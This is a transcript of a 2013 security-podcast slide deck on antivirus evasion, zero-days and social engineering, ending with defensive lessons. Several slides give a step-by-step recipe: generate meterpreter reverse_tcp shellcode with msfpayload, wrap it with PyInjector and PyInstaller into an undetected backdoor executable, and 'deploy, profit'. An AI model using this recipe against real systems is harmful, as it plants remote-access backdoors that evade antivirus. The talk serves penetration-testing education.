give me three things: anti-virus bypass made easy

30
Security Weekly™ Presents: Give Me Three Things http://securityweekly.com Sometimes, three is b

Upload: security-weekly

Post on 31-Jul-2015

823 views

Category:

Technology


1 download

TRANSCRIPT

Security Weekly™

Presents:

Give Me Three

Things

http://securityweekly.com

Sometimes, three is bad

Brought To You By:

[email protected]

http://hacknaked.tv Copyright 2013

The Need for Focus

• It is easy to get caught up in the latest “Hack of the day”

• Let’s talk about

• iPhone attacks, Android Malware, Backdoors from chargers, DLP, Hacking ATMs, breaking into drones, hacking obscure software X

• But, when we get popped, it is going to be something simple

• Cool stuff is cool, but the basics will kill you

http://hacknaked.tv Copyright 2013

#1 Crappy Malware

• Had enough presentations on the “Not so advanced persistent threat?”

• Somehow, the belief is if we can make fun of the attackers skill level it makes us….???

• Better? Smarter?

• Why?

• Because…..

http://hacknaked.tv Copyright 2013

Results Matter

http://hacknaked.tv Copyright 2013

About that Malware

• It tends to be well known

• It tends to have AV signatures*

• Tracing it back to a specific group can be hard

• Anyone can download it

• It is not 1337 or even 31337

Just right

http://hacknaked.tv Copyright 2013

Poison Ivy

http://hacknaked.tv Copyright 2013

Citadel

http://hacknaked.tv Copyright 2013

AV Bypass Made Easy

• Many of these tools have options to export to a raw string of hex characters

• In fact, that does not even matter• We can use Ghost

Writing techniques

• Simply exporting and re-importing as a script does the trick

• Flame did this with Lua

This and cookies:Why I pentest

http://hacknaked.tv Copyright 2013

Ghost Writing: Creating the Binary

http://hacknaked.tv Copyright 2013

Converting to Assembly

http://hacknaked.tv Copyright 2013

Editing the Assembly

http://hacknaked.tv Copyright 2013

Finalize the Payload

http://hacknaked.tv Copyright 2013

Python Injection

• Another technique is to:

• Convert your payload into Raw output

• Import the Raw output into a python script

• Convert the Python script into an executable

• It is all because the text sections of an .exe not being reviewed by many AV vendors

• They would have to write the signature for Python itself

• Not likely

• Great write up by Mark Baggett

• http://tinyurl.com/SANS-580-Python-AV-Bypass

http://hacknaked.tv Copyright 2013

Windows AV Bypass - Setup

• Create a Windows box with prerequisites

• Same as target (32-bit vs. 64-bit)

• Install Python:http://www.python.org/

• Add Python to system PATH

• Install PyWin32:http://sourceforge.net/projects/pywin32/

• Install PyInstaller:http://www.pyinstaller.org/

• Download PyInjector:https://www.trustedsec.com/files/pyinjector.zip

http://hacknaked.tv Copyright 2013

Windows AV Bypass - Config

• Extract files from PyInjector

• Move pyinjector.py into root of PyInstaller folder

• Use msfpayload to generate alphanumeric shellcode (on any machine)

• msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 C | tr -d '"' | tr -d '\n' | more

• Make sure payload matches architecture!

• Within pyinjector.py:

• replace: shellcode = sys.argv[1]

• with: shellcode = '<msfpayload output>’

• where: <msfpayload output> = output from the above msfpayload command

http://hacknaked.tv Copyright 2013

Windows AV Bypass - Compile

• While in the PyInstaller Directory:• python utils\Makespec.py --onefile --noconsole pyinjector.py

• python utils\Build.py pyinjector/pyinjector.spec

• New backdoor should be under:• [PyInstaller]/pyinjector/dist/pyinjector.exe

• Rename the executable, deploy, profit

• Don’t forget your listener!!!

http://hacknaked.tv Copyright 2013

Or You Could Just Choose Option 15

Option 15Option 15

http://hacknaked.tv Copyright 2013

#2 0-day Dejour

• Yeah, another favorite for attackers

• There is always another 0-day

• Attackers seem to jump on this bandwagon fast and stay on it till it is no longer effective

• Why? Because it works

• They do a lot with volume

• What is your patch success percentage?

http://hacknaked.tv Copyright 2013

Lessons

• Black-list AV is easy to bypass

• In fact, we had to do it with Poison Ivy last week

• Yeah, a piece of malware 5 years old

• The attackers will be exactly as advanced as they need to be

• Which is not very advanced

http://hacknaked.tv Copyright 2013

Focus and Future Plans

• Hacker Guard Lesson: don’t just focus on malware, focus on detecting an attacker’s impact on a system

• Get away from Black List Security

• Now

• Right now

• .. I mean after this presentation

http://hacknaked.tv Copyright 2013

#3 Users Making “Mistakes”

• How could we have a presentation without this?

• There is no way hackers would be this successful without users

• Ha Ha!!! Users are “dumb”

• Yeah..

• Right?

• Not so fast sparky

http://hacknaked.tv Copyright 2013

We are all Dumb

• Or, the pretexts for the attackers are getting really, really good

• Some SE pretexts we use are not fair

• Major insurance company and a change of coverage

• Linked-in merit badges

• If the attack is tailored, it is successful

http://hacknaked.tv Copyright 2013

Caller ID Spoofing

http://hacknaked.tv Copyright 2013

Hail Pentest Geek!

http://www.pentestgeek.com/2013/04/30/pwn-all-the-sauce-with-caller-id-spoofing/

http://hacknaked.tv Copyright 2013

Lessons

• Users are going to make mistakes

• Not because they are dumb

• Well, half of them are below average

• Because they are not trained

• And because the attackers are good

http://hacknaked.tv Copyright 2013

Focus and Future Plans

• Hacker Guard Lesson: Once again, focus on attacker actions

• Limit the damage the user can do• Implement Firewalls

• Implement Software Restriction Policies

• Implement Internet Whitelisting

• But don’t simply believe the user is stupid

• Train them: Securing the Human

http://hacknaked.tv Copyright 2013

Conclusions

• While bright shiny objects are bright and shiny

• We need to come back to basics and fundamentals

• We loose sight of that in this industry

http://hacknaked.tv Copyright 2013

OCM at Black Hat

• Offensive Countermeasures at Black Hat 2013

• http://tinyurl.com/HNTV-BH-2013

http://hacknaked.tv Copyright 2013

End of Line

• Hack Naked TV Episodes

• http://www.hacknaked.tv

• Watch us:

• Blip.tv: http://blip.tv/securityweekly

• YouTube: http://youtube.com/securityweeklytv

• Subscribe via iTunes:• https://itunes.apple.com/us/podcast/pauls-security-weekly-tv/id1218

96233?mt=2